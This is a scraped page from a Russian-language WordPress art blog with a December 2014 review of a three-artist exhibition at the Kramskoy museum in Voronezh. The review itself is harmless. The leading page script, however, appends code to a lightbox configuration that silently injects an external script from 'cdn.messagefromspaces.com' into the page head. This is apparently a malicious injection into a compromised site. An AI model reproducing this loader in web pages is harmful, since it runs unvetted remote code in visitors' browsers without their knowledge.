, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Музей им. И. Н. Крамского открытие выставки «ОДИН+ОДИН+ОДИН»

Автор: Дмитрий Алмазов | 22 Дек 2014

В Воронеже, 19 декабря мне удалось посетить выставочный зал художественного музея им. И. Н. Крамского, там состоялось открытие выставки «ОДИН+ОДИН+ОДИН». Не часто удается следить за творением современных авторов и живопись в наше время не ценится большинством как искусство, а больше как украшение пустых стен. Поэтому я решил взглянуть по-новому на творение нашего века.

Скульпторы Андрея Плиева на первый взгляд его творения просты и печальны, но присмотревшись к позам и безликим людям можно прочувствовать одиночество и боль. Особенно облик человека спрятавшегося в плащ, и идя босым оглядываясь на других. Видимо это состояние души человека мне очень знакомо. У каждого одиночества есть свои разные оттенки и глядя на его скульптуры начинаешь понимать что с нами рядом всегда будет некая пустота, которая сопровождает каждого человека всю его жизнь.

Художник Евгений Кравцов пишет монохромные пейзажи, портреты и натюрморты. Перейдя к его картинам я словно очутился в ностальгическом черно-белом кино. Каждая его работа словно стоп кадр: пролитое молоко, старые сараи, лодка заполненная водой, все это тоже должно навеять на вас нотку грусти, но в те времена мы всем народом выживали как могли, мы так жили и все равно улыбались, нас радовала веселая баня, букеты цветов что находили в поле и те сараи что строили уже давно превратились в высоко этажные дома для всех нас. И своей тонкой обработкой Евгений заставляет зрителя погружаться в сложный мир в котором нам дали будущее наши корни.

И третий Михаил Кабан-Петров пишет бесконечные пространства, пустоты, загадочные окраины. Не каждому может стать понятно в чем замысел его картин, поскольку в них с первого взгляда можно

увидеть лишь цвет и фактуру, можно заметить что какой то цвет слишком нагружен или совсем не такой как в реальности, словно в них что то спрятано, в каком то предмете или в светлой дороге. Возможно автор берет свое вдохновение не из головы, а из чего то более глубокого чем душа. И это хороший повод присматриваться к его живописи очень внимательно, увидеть или прочувствовать то что не смог я.

В экспозиции представлено около 100 работ, созданных авторами за последние 10 лет. После просмотра всего их творчества вам становится понятно что у них есть что то общее. Их объединяет похожее мировоззрение, отношение к вечному, к традициям, к искусству. Втроем они показывают насколько мы различаемся, но все равно едины.

Темы: Арт Воронеж, Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress